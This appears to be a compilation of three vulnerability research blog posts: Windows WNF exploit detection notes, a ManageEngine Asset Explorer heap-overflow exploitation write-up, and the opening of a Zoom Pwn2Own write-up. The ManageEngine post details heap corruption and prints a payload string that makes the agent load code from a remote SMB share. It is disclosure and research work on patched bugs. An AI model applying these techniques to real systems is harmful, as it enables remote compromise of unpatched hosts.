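tracerpt kernel-file.etl -o kernel-file.xml -of XML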

As this vulnerability can be exploited at low integrity (and thus from a sandbox), the detection mechanisms would vary based on whether an attacker had local code execution or chained it together with a browser exploit.

One idea for endpoint detection and response (EDR) based detection would be that a browser renderer process executing both of these actions (in the case of using this exploit to break out of a browser sandbox) would warrant deeper investigation. For example, whilst loading a new tab and web page, the browser process "MicrosoftEdge.exe" triggers these events legitimately under normal operation, whereas the sandboxed renderer process "MicrosoftEdgeCP.exe" does not. Chrome did not trigger either of the events while loading a new tab and web page. I didn’t explore too deeply whether there are any renderer operations which could trigger this non-maliciously, but this provides a place where defenders can explore further.

WNF Operations

The second area investigated was to determine if there were any ETW events produced by WNF based operations. Looking through the "Microsoft-Windows-Kernel-*" providers I could not find any related events which would help in this area. Therefore, detecting the spray through any ETW logging of WNF operations did not seem feasible. This was expected due to the WNF subsystem not being intended for use by non-MS code.

Crash Dump Telemetry

Crash Dumps are a very good way to detect unreliable exploitation techniques or if an exploit developer has inadvertently left their development system connected to a network. MS08-067 is a well known example of Microsoft using this to identify an 0day from their WER telemetry. This was found by looking for shellcode, however, certain crashes are pretty suspicious when coming from production releases. Apple also seem to have added telemetry to iMessage for suspicious crashes too.

In the case of this specific vulnerability being exploited via WNF, there is a slim chance (approx. <5%) that the following BSOD can occur, which could act as a detection artefact:

```
Child-SP          RetAddr           Call Site
ffff880f`6b3b7d18 fffff802`1e112082 nt!DbgBreakPointWithStatus
ffff880f`6b3b7d20 fffff802`1e111666 nt!KiBugCheckDebugBreak+0x12
ffff880f`6b3b7d80 fffff802`1dff3fa7 nt!KeBugCheck2+0x946
ffff880f`6b3b8490 fffff802`1e0869d9 nt!KeBugCheckEx+0x107
ffff880f`6b3b84d0 fffff802`1deeeb80 nt!MiSystemFault+0x13fda9
ffff880f`6b3b85d0 fffff802`1e00205e nt!MmAccessFault+0x400
ffff880f`6b3b8770 fffff802`1e006ec0 nt!KiPageFault+0x35e
ffff880f`6b3b8908 fffff802`1e218528 nt!memcpy+0x100
ffff880f`6b3b8910 fffff802`1e217a97 nt!ExpWnfReadStateData+0xa4
ffff880f`6b3b8980 fffff802`1e0058b5 nt!NtQueryWnfStateData+0x2d7
ffff880f`6b3b8a90 00007ffe`e828ea14 nt!KiSystemServiceCopyEnd+0x25
00000082`054ff968 00007ff6`e0322948 0x00007ffe`e828ea14
00000082`054ff970 0000019a`d26b2190 0x00007ff6`e0322948
00000082`054ff978 00000082`054fe94e 0x0000019a`d26b2190
00000082`054ff980 00000000`00000095 0x00000082`054fe94e
00000082`054ff988 00000000`000000a0 0x95
00000082`054ff990 0000019a`d26b71e0 0xa0
00000082`054ff998 00000082`054ff9b4 0x0000019a`d26b71e0
00000082`054ff9a0 00000000`00000000 0x00000082`054ff9b4
```

Under normal operation you would not expect a memcpy operation to fault accessing unmapped memory when triggered by the WNF subsystem. Whilst this telemetry might lead to attack attempts being discovered prior to an attacker obtaining code execution, once kernel code execution or SYSTEM has been gained they may just disable the telemetry or sanitise it afterwards – especially in cases where there could be system instability post exploitation. Windows 11 looks to have added additional ETW logging with these policy settings to determine scenarios when this is modified:

Windows 11 ETW events.

Conclusion

This article demonstrates some of the further lengths an exploit developer needs to go to achieve more reliable and stable code execution beyond a simple POC.

At this point we now have an exploit which is much more successful and less likely to cause instability on the target system than a simple POC. However, we can only achieve around a 90% success rate due to the techniques used. This seems to be about the limit with this approach and without using alternative exploit primitives. The article also gives some examples of potential ways to identify exploitation of this vulnerability and detect memory corruption exploits in general.

Acknowledgements

Boris Larin, for discovering this 0day being exploited within the wild and the initial write-up.

Yan ZiShuang, for performing parallel research into exploitation of this vuln and blogging about it.

Alex Ionescu and Gabrielle Viala for the initial documentation of WNF.

Corentin Bayet, Paul Fariello, Yarden Shafir, Angelboy, Mark Yason for publishing their research into the Windows 10 Segment Pool/Heap.

Aaron Adams and Cedric Halbronn for doing multiple QA’s and discussions around this research.

Integer Overflow to RCE — ManageEngine Asset Explorer Agent (CVE-2021–20082)

A couple months back, Chris Lyne and I had a look at ManageEngine ServiceDesk Plus. This product consists of a server / agent model in which agents provide updates on machine status back to the Manage Engine server. Chris ended up finding an unauth XSS-to-RCE chain in the server component which you can read here: https://medium.com/tenable-techblog/stored-xss-to-rce-chain-as-system-in-manageengine-servicedesk-plus-493c10f3e444, allowing an attacker to fully compromise the server with SYSTEM privileges.

The blog here will go over the exploitation of an integer overflow that I found in the agents themselves (CVE-2021-20082), called Asset Explorer Agent. This exploit could allow an attacker to pivot through the network once the ManageEngine server is compromised. Alternatively, it could be exploited by spoofing the ManageEngine server IP on the network and triggering this vulnerability, as we will touch on later. While this PoC is not super reliable, it has been proven to work after several tries on a Windows 10 Pro 20H2 box (see below). I believe that further work on heap grooming could increase exploitation odds.

Linux machine (left), remotely exploiting integer overflow in ManageEngine Asset Explorer running on Windows 10 (right) and popping up a “whoami” dialog.

Attack Vector

The ManageEngine Windows agent executes as a SYSTEM service and listens on the network for commands from its ManageEngine server. While TLS is used for these requests, the agent never validates the certificate, so anyone on the network is able to perform this TLS handshake and send an unauthorized command to the agent. In order for the agent to run the command, however, the agent expects to receive an authtoken, which it echoes back to its configured server IP address for final approval. Only then will the agent carry out the command. This presents a small problem since that configured IP address is not ours; the agent instead asks the real ManageEngine server to approve our sent authtoken, which is always going to be denied.

There is a way an attacker can exploit this design however and that’s by spoofing their IP on the network to be the Manage Engine server. I mentioned certs are not validated which allows an attacker to send and receive requests without an issue. This allows full control over the authtoken approval step, resulting in the agent running any arbitrary agent command from an attacker.

From here, you may think there is a command that can remotely run tasks or execute code on agents. Unfortunately, this was not the case, as the agent is very lightweight and supports a limited amount of features, none of which allowed for logical exploitation. This forced me to look into memory corruption in order to gain remote code execution through this vector. From reverse engineering the agents, I found a couple of small memory handling issues, such as leaks and heap overflow with unicode data, but nothing that led me to RCE.

Integer Overflow

When the agent receives final confirmation from its server, it is in the form of a POST request from the Manage Engine server. Since we are assuming the attacker has been able to insert themselves as a fake Manage Engine server or has compromised a real Manage Engine server, this allows them to craft and send any POST response to this agent.

When the agent processes this POST request, WINAPIs for HTTP handling are used. One of these is HttpQueryInfoW, which is used to query the incoming POST request for its “Content-Size” field. This Content-Size field is then used as a size parameter in order to allocate memory on the heap to copy over the POST payload data.

There is some integer arithmetic performed between receiving the Content-Size field and actually using this size to allocate heap memory. This is where we can exploit an integer overflow.

Here you can see the Content-Size is incremented by one, multiplied by four, and finally incremented by an extra two bytes. This is a 32-bit agent, using 32-bit integers, which means if we supply a Content-Size field the size of UINT32_MAX/4, we should be able to overflow the integer to wrap back around to size 2 when passed to calloc. Once this allocation of only two bytes is made on the heap, the following API InternetReadFile, will copy over our POST payload data to the destination buffer until all its POST data contents are read. If our POST data is larger than two bytes, then that data will be copied beyond the two byte buffer resulting in heap overflow.
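
To make that arithmetic concrete, here is a minimal sketch of the wrap-around; the exact expression is a reconstruction of the description above, not the agent's decompiled code:

#include <stdint.h>
#include <stdio.h>

int main(void) {
    /* Attacker-controlled Content-Size value: UINT32_MAX / 4. */
    uint32_t content_size = 0x3FFFFFFFu;

    /* Reconstruction of the arithmetic described above, in 32-bit math:
     * (size + 1) * 4 + 2 wraps around the 32-bit range back to 2. */
    uint32_t alloc_size = (content_size + 1u) * 4u + 2u;

    printf("calloc size: %u\n", alloc_size);   /* prints 2 */
    /* calloc(2, 1) then only reserves two bytes, while InternetReadFile
     * copies the full POST body into it -> controlled heap overflow. */
    return 0;
}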

Things are looking really good here because we can not only control the size of the heap overflow (tailoring our POST data size to overwrite whatever amount of heap memory we like), but we can also write non-printable characters with this overflow, which is always good for exploiting write conditions.

No ASLR

Did I mention these agents don’t support ASLR? Yeah, they are compiled with no relocation table, which means even if Windows 10 tries to force ASLR, it can’t and defaults the executable base to the PE ImageBase. At this point, exploitation was sounding too easy, but quickly I found…it wasn’t.

Creating a Write Primitive

I can overwrite a controlled amount of arbitrary data on the heap now, but how do I write something and somewhere…interesting? This needs to be done without crashing the agent. From here, I looked for pointers or interesting data on the heap that I could overwrite. Unfortunately, this agent’s functionality is quite small and there were no object or function pointers or interesting strings on the heap for me to overwrite.

In order to do anything interesting, I was going to need a write condition outside the boundaries of this heap segment. For this, I was able to craft a Write-AlmostWhat-Where by abusing heap cell pointers used by the heap manager. Asset Explorer contains Microsoft’s CRT heap library for managing the heap. The implementation uses a double-linked list to keep track of allocated cells, and generally looks something like this:

Just like when any linked list is altered (in this case via a heap free or heap malloc), the next and prev pointers must be readjusted after insertion or deletion of a node (seen below).

For our attack we will be focusing on exploiting the free logic which is found in the Microsoft Free_dbg API. When a heap cell is freed, it removes the target node and remerges the neighboring nodes. Below is the Free_dbg function from Microsoft library, which uses _CrtMemBlockHeader for its heap cells. The red blocks are the remerging logic for these _CrtMemBlockHeader nodes in the linked list.

This means if we overwrite a _CrtMemBlockHeader* prev pointer with an arbitrary address (ideally an address outside of this cursed memory segment we are stuck in), then upon that heap cell being freed, the _CrtMemBlockHeader* next pointer will be written to wherever *prev points. It gets better…we can also overflow into the _CrtMemBlockHeader* next pointer as well, allowing us to control what *next is, thus creating an arbitrary write condition for us — one DWORD at a time.

There is a small catch, however. The _CrtMemBlockHeader* next and _CrtMemBlockHeader* prev are both dereferenced and written to in this remerging logic, which means I can't just overwrite the *prev pointer with any arbitrary data I want, as it must itself be a valid pointer to a writable memory location, since its contents will also be written to during the Free_dbg function. This means I can only write pointers to places in memory, and these pointers must point to writable memory themselves. This prevents me from writing executable memory pointers (as those point to RX protected memory) as well as preventing me from writing pointers to non-existent memory (as the dereference step in Free_dbg will cause an access violation). This proved to be very constraining for my exploitation.
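
As a rough sketch of this primitive, the following models the remerging (unlink) writes of the CRT debug heap; field names follow the public _CrtMemBlockHeader definition, the remaining fields are omitted, and the stand-in variables are purely illustrative:

#include <stdio.h>

/* Field names follow the public _CrtMemBlockHeader definition (dbgint.h). */
typedef struct _CrtMemBlockHeader {
    struct _CrtMemBlockHeader *pBlockHeaderNext;
    struct _CrtMemBlockHeader *pBlockHeaderPrev;
    /* ...file name, line number, data size, block use, request, gap... */
} CrtMemBlockHeader;

/* Simplified remerging logic from Free_dbg: both assignments write through
 * pointers taken from the (overflowable) header. */
static void unlink_on_free(CrtMemBlockHeader *hdr) {
    hdr->pBlockHeaderNext->pBlockHeaderPrev = hdr->pBlockHeaderPrev;
    hdr->pBlockHeaderPrev->pBlockHeaderNext = hdr->pBlockHeaderNext;
}

int main(void) {
    /* Stand-ins: "target" plays the role of a global in .data, "value" the
     * role of a heap pointer we want written there. Both are dereferenced,
     * so both must themselves be writable, exactly the constraint above. */
    CrtMemBlockHeader target = {0}, value = {0};
    CrtMemBlockHeader corrupted = { .pBlockHeaderNext = &value,
                                    .pBlockHeaderPrev = &target };
    unlink_on_free(&corrupted);
    printf("target now holds the chosen pointer: %d\n",
           target.pBlockHeaderNext == &value);   /* prints 1 */
    return 0;
}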

Data-Only Attack

Data-only attacks are getting more popular for exploiting memory corruption bugs, and I’m definitely going to opt for that here. This binary has no ASLR to worry about, so browsing the .data section of the executable and finding an interesting global variable to overwrite is the best step. When searching for these, many of the global variables point to strings, which seem cool — but remember, it will be very hard to abuse my write primitive to overwrite string data, since the string data I would want to write must represent a pointer to valid and writable memory in the program. This limits me to searching for an interesting global variable pointer to overwrite.

Step 1 : Overwrite the Current Working Directory

I found a great candidate to leverage this pointer write primitive. It is a global variable pointer in Asset Explorer’s .data section that points to a unicode string that dictates the current working directory of the Manage Engine agent.

We need to know how this is used in order to abuse it correctly, and a few XREFs later, I found this string pointer is dereferenced and passed to SetCurrentDirectory whenever a “NEWSCAN” request is sent to the agent (which we can easily do as a remote attacker). This call dynamically changes the current working directory for the remote Asset Explorer service, which is exactly what I was shooting for in developing an exploit. Even better, the NEWSCAN request then calls “CreateProcess” to execute a .bat file from the current working directory. If we can modify this current working directory to point to a remote SMB share we own, and place a malicious .bat file on our SMB share with the same name, then Asset Explorer will try to execute this .bat file off our SMB share instead of the local one, resulting in RCE. All we need to do is modify this pointer so that it points to a malicious remote SMB path we own, trigger a NEWSCAN request so that the current working directory is changed, and make it execute our .bat file.
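
For illustration, a minimal sketch of the behaviour being abused; the share path and .bat file name are made up, and this is not the agent's code:

#include <windows.h>

int main(void) {
    /* What the hijacked NEWSCAN handler effectively ends up doing once the
     * global working-directory string has been replaced: */
    SetCurrentDirectoryW(L"\\\\192.0.2.1\\a\\");   /* attacker-controlled share (example IP) */

    /* A relative name now resolves against that share. (As described below,
     * CreateProcess turned out to refuse .bat files on UNC paths, which is
     * what forced the DLL-loading detour instead.) */
    wchar_t cmd[] = L"scan.bat";                   /* hypothetical file name */
    STARTUPINFOW si = { sizeof(si) };
    PROCESS_INFORMATION pi;
    if (CreateProcessW(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }
    return 0;
}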

Since ASLR is not enabled, I know what this pointer address will be, so we just need to trigger our heap overflow to exploit my pointer write condition with Free_dbg to replace this pointer.

To effectively change this current working directory, you would need to:

1. Trigger the heap overflow to overwrite the *next and *prev pointers of a heap cell that will be freed (medium)

2. Overwrite the *next pointer with the address of this current working directory global variable as it will be the destination for our write primitive (easy)

3. Overwrite the *prev pointer with a pointer that points to a unicode string of our SMB share path (hard).

4. Trigger new scan request to change current working directory and execute .bat file (easy)

For step 1, this ideally would require some grooming, so we could trigger our overflow once our cell is flush against another heap cell and carefully overwrite its _CrtMemBlockHeader. Unfortunately, my heap grooming attempts were not working to force allocations where I wanted. This is partly due to the limited sizes I was able to allocate in the remote process, and in large part due to my limited Windows 10 heap grooming experience. Luckily, there was pretty much no penalty for failed overflow attempts, since I am only overwriting the linked list pointers of heap cells and the heap manager was apparently very ok with that. With that in mind, I ran my heap overflow several times and hoped it would write over a particular existing heap cell with my write primitive payload. I found ~20 attempts of this overflow will usually end up working to overflow the heap cell I want.

What is the heap cell I want? Well, I need it to be a heap cell which will be freed because that’s the only way to trigger my arbitrary write. Also, I need to know where I sprayed my malicious SMB path string in heap memory, since I need to overwrite the current working directory global variable with a pointer to my string. Without knowing my own string address, I have no idea what to write. Luckily I found a way to get around this without needing an infoleak.

Bypassing the Need for Infoleak

In my PoC I am initially sending a string like the following to the agent:

XXXXXXXX1#X#X#XXXXXXXX3#XXXXXXXX2#//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//UNC//127.0.0.1/a/

Asset Explorer will parse this string out once received and allocate a unicode string for each substring delimited by “#” symbols. Since the heap is allocated in a doubly linked list fashion, the order of allocations here will be sequentially appended in the linked list. So, what I need to do is overflow into the heap cell headers for the “XXXXXXXX2” string with understanding that its _CrtMemBlockHeader* next pointer will point to the next heap cell to be allocated, which is always the //.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//UNC//127.0.0.1/a/ string.

If we overwrite the _CrtMemBlockHeader* prev with the .data address of the current working directory path, and only overwrite the first (lowest order) byte of the _CrtMemBlockHeader* prev pointer, then we won't need an info leak. Since the upper three bytes dictate the SMB string's general memory address, we just need to offset the last byte so that it will point to the actual string data rather than the _CrtMemBlockHeader structure it currently points to. This is why I chose to overwrite the lowest order byte with “0xf8”, to guarantee a maximum offset from the _CrtMemBlockHeader.
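
A tiny sketch of the partial-overwrite idea, with an illustrative pointer value rather than a real leak:

#include <stdint.h>
#include <stdio.h>

int main(void) {
    /* Example value of the saved heap-cell pointer (illustrative only). */
    uint32_t saved_ptr = 0x00d4a340u;

    /* Overwriting only the lowest byte keeps the upper three bytes (the
     * "general memory address" of the SMB string) intact and forces the low
     * byte to 0xf8, so the result lands somewhere past the _CrtMemBlockHeader
     * and, with the path "sled", hopefully inside the SMB path string. */
    uint32_t adjusted = (saved_ptr & 0xffffff00u) | 0xf8u;

    printf("0x%08x -> 0x%08x\n", saved_ptr, adjusted);
    return 0;
}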

It's beneficial if we can craft an SMB path string that has nonsense characters prepended to it (similar to a nop-sled, but for a file path). This will give us a greater probability that our 0xf8 offset points somewhere in our SMB path string that allows SetCurrentDirectory to interpret it as a valid path with prepended nonsense characters (ie: .\.\.\.\.\<path>). Unfortunately, .\.\.\.\ wouldn't work for an SMB share, so thanks go to Chris Lyne, who was able to craft a nicely padded SMB path like this for me:

//.//.//.//.//.//UNC//<ip_address>/a/

This will allow the path to be simply treated as “//<ip_address>/a/”. If we provide enough “//.” in front of our path, we will have about a ⅓ chance of this hitting our sled properly when overwriting the lowest *prev byte with 0xf8. These are much better odds than if I used a simple, straightforward SMB string.

I ran my exploit, witnessed it overwrite the current working directory, and then saw Asset Explorer attempt to execute our .bat file off our remote SMB share…but it wasn’t working. It was that day when I learned .bat files cannot be executed off remote SMB shares with CreateProcess.

Step 2: Hijacking Code Flow

I didn’t come this far to just give up, so we need to look at a different technique to turn our current working directory modification into remote code execution. Libraries (.dll files) do not have this restriction, so I search for places where Asset Explorer might try to load a library. This is a tough ask, because it has to be a dynamic loading of a library (not super common for applications to do) that I can trigger, and also — it cannot be a known dll (ie: kernel32.dll, rpcrt4.dll, etc), since search order for these .dlls will not bother with the application’s current working directory, but rather prioritize loading from a Windows directory. For this I need to find a way to trigger the agent to load an unknown dll.

After searching, I found a function called GetPdbDll in the agent where it will attempt to dynamically load “Mspdb80.dll”, a debugging dll used for RTC (runtime checks). This is an unknown dll, so the agent should attempt to load it from its current working directory. Ok, so how do I call this thing?

Well, you can't… I couldn't find any XREFs to code flow that could end up calling this function. I assumed it was left in as a stub from the compiler, as I couldn't even find indirect calls that might lead code flow here. I will have to abandon my data-only attack plan here and attempt to hijack code flow for this last part.

I am unable to write executable pointers with my write primitive, so this means I can't just write this GetPdbDll function address as a return address on stack memory, nor can I even overwrite a function pointer with this function address. There was one place, however, where I saw a pointer TO a function pointer being called, which is actually possible for me to abuse. It's in the _CrtDbgReport function, which allows the Microsoft runtime to alert in the event of various integrity violations, one of which is a failure in a heap integrity check. When using a debug heap (like in this scenario) it can be triggered if it detects unwritten portions of heap memory not containing “0xfd” bytes, since that is supposed to represent “dead-land-fill” (this is why my PoC tries to mimic these 0xfd bytes during my heap overflow, to keep this thing happy). However, this time…we WANT to trigger a failure, because in _CrtDbgReport we see this:

From my research, this is where _CrtDbgReport calls a _pfnReportHook (if the application has one registered). This application does not have one registered, but let us leverage our Free_dbg write primitive again to write our own _pfnReportHook (it lives in the .data section too!). This is also great because this doesn't have to be a pointer to executable memory (which we can't write), because _pfnReportHook contains a pointer TO a function pointer (a big beneficial difference for us). We just need to register our own _pfnReportHook that contains a function pointer to the function that loads “MSPDB80.dll” (no arguments needed!). Then we trigger a heap error so that _CrtDbgReport is called and in turn calls our _pfnReportHook. This should load and execute the “MSPDB80.dll” off our remote SMB share. We have to be clever with our second write primitive, as we can no longer borrow the technique I used earlier where subsequent heap cell allocations are used to bypass the infoleak. This is because that unique scenario only applied to unicode strings in this application, and we can't represent our function pointers with unicode. For this step I chose to overwrite the _pfnReportHook variable with a random offset into my heap (again, no infoleak required; a similar technique to partially overwriting the _CrtMemBlockHeader* next pointer, but this time overwriting its lower two bytes in order to obtain a decent random heap offset). I then trigger my heap overflow again in order to clobber an enormous portion of the heap with repeating function pointers to the GetPdbDll function.
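
For reference, this is what the legitimate report-hook mechanism looks like when registered normally; a minimal sketch that needs the debug CRT (e.g. /MDd) to actually fire. The exploit instead plants the hook pointer directly in .data with the write primitive:

#include <crtdbg.h>
#include <stdio.h>

/* A legitimate report hook: _CrtDbgReport invokes this before reporting a
 * debug-heap error or other CRT integrity failure. */
static int my_report_hook(int report_type, char *message, int *return_value) {
    printf("CRT report (%d): %s", report_type, message ? message : "\n");
    *return_value = 0;   /* do not break into the debugger */
    return 1;            /* report handled, skip the default output */
}

int main(void) {
    _CrtSetReportHook(my_report_hook);
    /* Any CRT report now reaches the hook first: */
    _CrtDbgReport(_CRT_WARN, __FILE__, __LINE__, NULL, "hello from %s\n", "the hook demo");
    return 0;
}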

Yes this will certainly crash the program but that’s ok! We are at the finish line and this severe heap corruption will trigger a call to our _pfnReportHook before a crash happens. From our earlier overwrite, our _pfnReportHook pointer should point to some random address in my heap which likely contains a GetPdbDll function pointer (which I massively sprayed). This should result in RCE once _pfnReportHook is called.

Loading dll off remote SMB share that displays a whoami

As mentioned, this is not a super reliable exploit as-is, but I was able to prove it can work. You should be able to find the PoC for this on Tenable's PoC github — https://github.com/tenable/poc. Manage Engine has since patched this issue. For more details you can check out the advisory at https://www.tenable.com/security/research.


Integer Overflow to RCE — ManageEngine Asset Explorer Agent (CVE-2021–20082) was originally published in Tenable TechBlog on Medium.

Zoom RCE from Pwn2Own 2021

On April 7 2021, Thijs Alkemade and Daan Keuper demonstrated a zero-click remote code execution exploit in the Zoom video client during Pwn2Own 2021. Now that the related bugs have been fixed for all users (see ZDI-21-971 and ZSB-22003) we can safely detail the bugs we exploited and how we found them. In this blog post, we wanted to not only explain the bugs and our exploit, but also provide a log of our entire process. We hope that detailing our process helps others with similar research in the future. While we had extensive experience with exploiting memory corruption vulnerabilities on many platforms, both of us had zero experience with this on Windows. So during this project we had a lot to learn about Windows internals.

Wow - with just 10 seconds left of their 2nd attempt, Daan Keuper and Thijs Alkemade were able to demonstrate their code execution via Zoom messenger. 0 clicks were used in the demo. They're off to the disclosure room for details. #Pwn2Own pic.twitter.com/qpw7yIEQLS

— Zero Day Initiative (@thezdi) April 7, 2021

This is going to be quite a long post. So before we dive into the details, now that the vulnerabilities have been fixed, below you can see a full run of the exploit (now fixed) in action. The post hereafter will explain in detail every step that took place during the exploitation phase and how we came to this solution.

Announcement

Participating in Pwn2Own was one of the initial goals we had for our new research department, Sector 7. When we made our plans last year, we didn’t expect that it would be as soon as April 2021. In recent years the Vancouver edition in spring has focused on browsers, local privilege escalation and virtual machines. The software in these categories has received a lot of attention to security, including many specific defensive layers. We’d also be competing with many others who may have had a full year to prepare their exploits.

To our surprise, on January 27th Pwn2Own was officially announced with a new category: “Enterprise Communications”, featuring Microsoft Teams and the Zoom Meetings client. These tools have become incredibly important due to the pandemic, so it makes sense for those to be added to Pwn2Own. We realized that either of these would be a much better target for us, because most researchers would have to start from scratch.

Announcing #Pwn2Own Vancouver 2021! Over $1.5 million available across 7 categories. #Tesla returns as a partner, and we team up with #Zoom for the new Enterprise Communications category. Read all the details at https://t.co/suCceKxI0T #P2O

— Zero Day Initiative (@thezdi) January 26, 2021

We had not yet decided between Zoom and Microsoft Teams. We made a guess for what type of vulnerability we would expect could lead to RCE in those applications: Microsoft Teams is developed using Electron with a few native libraries in C++ (mainly for platform integration). Electron apps are built using HTML+JavaScript with a Chromium runtime included. The most likely path for exploitation would therefore be a cross-site scripting issue, possibly in combination with a sandbox escape. Memory corruption could be possible, but the number of native libraries is small. Zoom is written in C++, meaning the most likely vulnerability class would be memory corruption. Without any good data on which would be more likely, we decided on Zoom, simply because we like doing research on memory corruption more than XSS.

Step 1: What is this “Zoom”?

Both of us had not used Zoom much (if at all). So, our very first step was to go through the application thoroughly, focused on identifying all ways you can send something to another user, as that was the vector we wanted for the attack. That turned out to be quite a list. Most users will mainly know the video chat functionality, but there is also a quite full-featured chat client included, with the ability to send images, create group chats, and much more. Within meetings, there's of course audio and video, but also another way to chat, send files, share the screen, etc. We made a few premium accounts too, to make sure we saw as many of the features as possible.

Step 2: Network interception

The next step was to get visibility into the network communication of the client. We would need to see the contents of the communication in order to be able to send our own malicious traffic. Zoom uses a lot of HTTPS requests (often with JSON or protobufs), but the chat functionality itself uses an XMPP connection. Meetings appear to have a number of different options depending on what the network allows, the main one being a custom UDP-based protocol. Using a combination of proxies, modified DNS records, sslsplit and a new CA certificate installed in Windows, we were able to inspect all traffic, including HTTP and XMPP, in our test environment. We initially focused on HTTP and XMPP, as the meeting protocol seemed like a (custom) binary protocol.

Step 3: Disassembly

The following step was to load the relevant binaries in our favorite disassemblers. Because we knew we wanted a vulnerability exploitable from another user, we started with trying to match the handling of incoming XMPP stanzas (a stanza is an XMPP element you can send to another user) to the code. We found that the XMPP XML stream is initially parsed by XmppDll.dll. This DLL is based on the C++ XMPP library gloox. This meant that reverse-engineering this part was quite easy, even for the custom extensions Zoom added.

However, it became quite clear that we weren’t going to find any good vulnerabilities here. XmppDll.dll only parses incoming XMPP stanzas and copies the XML data to a new C++ object. No real business logic is implemented here, everything is passed to a callback in a different DLL.

In the next DLL’s we hit a bit of a wall. The disassembly of the other DLL’s was almost impossible to get through due to a large number of calls to vtables and other DLL’s. Almost nothing was available to give us some grip on the disassembled code. The main reason for that was that most DLL’s do no logging at all. Logs are of course useful for dynamic analysis, but also for static analysis they can be very useful, as they often reveal function and variable names and give information about what checks are performed. We found that Zoom had generated a log of the installation, but while running it nothing was logged at all.

After some searching, we found the support pages for how to generate a Troubleshooting log for Zoom:

After reporting a problem through the desktop client, the Support team may ask you to install a special troubleshooting package of Zoom to log more information about your issue and help Zoom engineers investigate the issue. After recreating the issue, these files need to be sent to your Zoom support agent via your existing ticket. The troubleshooting version does not allow Zoom support or engineering access to your computer, but rather just gathers more information about your specific issue.

This suggests that logging is compile-time disabled, but special builds with logging do exist. They are only given out by support to debug a specific issue. For bug bounties any form of social engineering is usually banned. While the Pwn2Own rules don’t mention it, we did not want to antagonize Zoom about this. Therefore, we decided to ask for this version. As Zoom was sponsoring Pwn2Own, we thought they might be willing to give us that client if we asked through ZDI, so we did just that. It is not uncommon for companies to offer specific tools for researchers to help in their research, such as test units Tesla can give to interested researchers.

Sadly, Zoom turned this request down - we don't know why. But before we could fall back to any social engineering, we found something else that was almost as good. It turns out Zoom has an SDK that can be used to integrate the Zoom meeting functionality into other applications. This SDK consists of many of the same libraries as the client itself, but in this case these DLL files do have logging present. It doesn't have all of them (some UI related DLL's are missing), but it has enough to get a good overview of the functionality of the core message handling.

The logging also revealed file names and function names, as can be seen in this disassembled example:

iVar2 = logging::GetMinLogLevel();
if (iVar2 < 2) {
    logging::LogMessage::LogMessage
              (local_c8,
               "c:\\ZoomCode\\client_sdk_2019_kof\\client\\src\\framework\\common\\SaasBeeWebServiceModule\\ZoomNetworkMonitor.cpp"
               , 0x39, 1);
    uVar3 = log_message(iVar2 + 8, "[NetworkMonitor::~NetworkMonitor()]", " ", uVar1);
    log_message(uVar3);
    logging::LogMessage::~LogMessage(local_c8);
}

Step 4: Hunting for bugs

With this we could start looking for bugs in earnest. Specifically, we were looking for any kind of memory corruption vulnerability. These often occur during parsing of data, but in this case that was not a likely vector for the XMPP connection. A well known library is used for XMPP and we would also need to get our payload through the server, so any invalid XML would not get to the other client. Many operations using strings are using C++ std::string objects, which meant that buffer overflows due to mistakes in length calculations are also not very likely.

About 2 weeks after we started this research, we noticed an interesting thing about the base64 decoding that was happening in a couple of places:

len = Cmm::CStringT<char>::size(param_1);
result = malloc(len << 2);
len = Cmm::CStringT<char>::size(param_1);
buffer = Cmm::CStringT<char>::c_str(param_1);
status = EVP_DecodeBlock(result, buffer, len);

EVP_DecodeBlock is the OpenSSL function that handles base64-decoding. Base64 is an encoding that turns three bytes into four characters, so decoding results in something which is always 3/4 of the size of the input (ignoring any rounding). But instead of allocating something of that size, this code is allocating a buffer which is four times larger than the input buffer (shifting left twice is the same as multiplying by four). Allocating something too big is not an exploitable vulnerability (maybe if you trigger an integer overflow, but that’s not very practical), but what it did show was that when moving data from and to OpenSSL incorrect calculations of buffer sizes might be present. Here, std::string objects will need to be converted to C char* pointers and separate length variables. So we decided to focus on the calling of OpenSSL functions from Zoom’s own code for a while.
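
A quick sketch of the size mismatch, purely to illustrate the observation (the tight bound is our own estimate, not Zoom's code):

#include <stdio.h>

int main(void) {
    /* A base64 input of n characters decodes to at most 3*n/4 bytes, yet the
     * code above allocates n << 2 (4*n) bytes for the output. */
    size_t n = 1024;                        /* length of the base64 input */
    size_t needed    = 3 * ((n + 3) / 4);   /* ~768 bytes would suffice */
    size_t allocated = n << 2;              /* 4096 bytes actually allocated */
    printf("needed <= %zu, allocated %zu\n", needed, allocated);
    return 0;
}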

Step 5: The Bug

Zoom’s chat functionality supports a setting named “Advanced chat encryption” (only available for paying users). This functionality has been around for a while. By default version 2 is used, but if a contact sends a message using version 1 then it is still handled. This is what we were looking at, which involves a lot of OpenSSL functions.

Version 1 works more or less like this (as far as we could understand from the code):

  1. The sender sends a message encrypted using a symmetric key, with a key identifier indicating which message key was used.
<message from="[email protected]/ZoomChat_pc" to="[email protected]" id="85DC3552-56EE-4307-9F10-483A0CA1C611" type="chat">
  <body>[This is an encrypted message]</body>
  <thread>gloox{BFE86A52-2D91-4DA0-8A78-DC93D3129DA0}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <ze2e>
    <tp>
      <send>[email protected]</send>
      <sres>ZoomChat_pc</sres>
      <scid>{01F97500-AC12-4F49-B3E3-628C25DC364E}</scid>
      <ssid>[email protected]</ssid>
      <cvid>zc_{10EE3E4A-47AF-45BD-BF67-436793905266}</cvid>
    </tp>
    <action type="SendMessage">
      <msg>
        <message>/fWuV6UYSwamNEc40VKAnA==</message>
        <iv>sriMTH04EXSPnphTKWuLuQ==</iv>
      </msg>
      <xkey>
        <owner>{01F97500-AC12-4F49-B3E3-628C25DC364E}</owner>
      </xkey>
    </action>
    <app v="0"/>
  </ze2e>
  <zmtask feature="35">
    <nos>You have received an encrypted message.</nos>
  </zmtask>
  <zmext expire_t="1680466611000" t="1617394611169">
    <from n="John Doe" e="[email protected]" res="ZoomChat_pc"/>
    <to/>
    <visible>true</visible>
  </zmext>
</message>
